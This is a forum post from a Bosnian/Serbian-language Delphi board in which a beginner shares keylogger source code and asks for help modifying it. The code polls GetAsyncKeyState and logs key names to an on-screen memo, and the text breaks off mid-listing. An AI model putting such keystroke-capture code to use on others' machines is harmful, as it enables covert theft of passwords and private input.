Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Napravio sam keylogger, ali bih želio male izmjene napraviti! Pomoć??

[es] :: Pascal / Delphi / Kylix :: Napravio sam keylogger, ali bih želio male izmjene napraviti! Pomoć??

Strane: 1 2

[ Pregleda: 8888 | Odgovora: 29 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Senaid_backo

Član broj: 191763
Poruke: 36
*.boljancic12.zona.ba.

Sajt: www.geeksoftware.org


+1 Profil

icon Napravio sam keylogger, ali bih želio male izmjene napraviti! Pomoć??14.02.2009. u 16:48 - pre 184 meseci
Pozdrav,

Pošto sam početnik u delhi-ju i želim da što više naučim, odlučio sam da napravim jedan mali keylogger, koji ne želim da zloupotrebljavam već čisto da vidim kako to funkcioniše. Nakon višesatnog rada uspio sam i napraviti, međutim mi se ne sviđa kako radi. A evo postavit ću i source code, a zatim i pitanja:

Code:

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ExtCtrls, StdCtrls;

type
  TForm1 = class(TForm)
    Memo1: TMemo;
    Timer1: TTimer;
    procedure Timer1Timer(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
implementation

{$R *.dfm}

function Write(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Write(' [BACKSPACE] ');
9: Write(' [TAB] ');
12: Write(' [ALT] ');
13: Write(' [ENTER] ');
16: Write(' [SHIFT] ');
17: Write(' [CONTROL] ');
18: Write(' [ALT] ');
20: Write(' [CAPS LOCK] ');
21: Write(' [PAGE UP] ');
27: Write(' [ESC] ');
33: Write(' [PAGE UP] ');
34: Write(' [PAGE DOWN] ');
35: Write(' [END] ');
36: Write(' [HOME] ');
37: Write ( '[LEFT ARROW]');
38: Write ( '[ARROW UP]');